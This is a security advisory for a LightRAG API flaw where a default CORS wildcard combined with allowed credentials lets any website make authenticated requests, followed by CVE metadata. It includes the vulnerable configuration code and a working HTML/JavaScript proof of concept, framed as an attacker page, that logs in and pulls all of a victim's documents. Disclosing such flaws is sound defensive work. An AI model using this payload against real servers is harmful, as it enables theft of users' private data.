CVE-2026-61736
### Summary The server defaults to CORS_ORIGINS=* combined with allow_credentials=True. Starlette's CORSMiddleware echoes the requesting origin in preflight responses when credentials are enabled, meaning every origin is effectively whitelisted for credentialed cross-origin requests. Any malicious website can perform authenticated API calls on behalf of a logged-in user. ### Details ```python # lightrag/api/config.py:639 args.cors_origins = get_env_value("CORS_ORIGINS", "*") # default wildcard # lightrag/api/lightrag_server.py:1379 app.add_middleware( CORSMiddleware, allow_origins=["*"], # any origin allow_credentials=True, # credentials — PROBLEM with wildcard allow_methods=["*"], allow_headers=["*"], ) # Starlette CORSMiddleware (confirmed in source): # preflight_explicit_allow_origin = not allow_all_origins or allow_credentials # = not True or True = True → echoes the requesting origin back, not "*" # Result: every origin receives Access-Control-Allow-Credentials: true ``` ### PoC Host on any origin. Open in browser where user is logged in to LightRAG: ```html <!-- attacker.com/steal.html --> <script> const TARGET = "http://lightrag-server:9621"; (async () => { // Get victim token (or re-use existing session) const r1 = await fetch(`${TARGET}/login`, { method: "POST", credentials: "include", headers: {"Content-Type": "application/x-www-form-urlencoded"}, body: "username=victim&password=known_pass" }); const { access_token } = await r1.json(); // Exfiltrate all documents const docs = await (await fetch(`${TARGET}/documents`, { credentials: "include", headers: { Authorization: `Bearer ${access_token}` } })).json(); console.log("STOLEN DOCS:", docs); })(); </script> ``` ### Impact Permissive cross-domain policy (CWE-942). Any website visited by an authenticated LightRAG user can silently make authenticated API requests, exfiltrating all documents and knowledge graph data or performing destruc
Properties
- severity
- critical
- summary
- LightRAG: CORS Wildcard + Credentials Enables Any-Origin Credentialed Requests
- epss_score
- 0.00532
- cvss_score
- 9.3
- ghsa_published
- 2026-07-20T21:45:25Z
- source_url
- https://github.com/advisories/GHSA-6x6h-qqr7-855w
- ghsa_updated
- 2026-07-20T21:45:27Z
- ghsa_id
- GHSA-6x6h-qqr7-855w
- cve_id
- CVE-2026-61736
- cvss_vector
- CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N
- is_ghsa_only
- false
- epss_percentile
- 0.42923
Related Entities (5)
ENRICHED_BY (1)
HAS_WEAKNESS (1)
REPORTED_BY (1)
VULNERABLE_TO (1)
AFFECTS (1)
Explore deeper with Ninja Signal's threat intelligence graph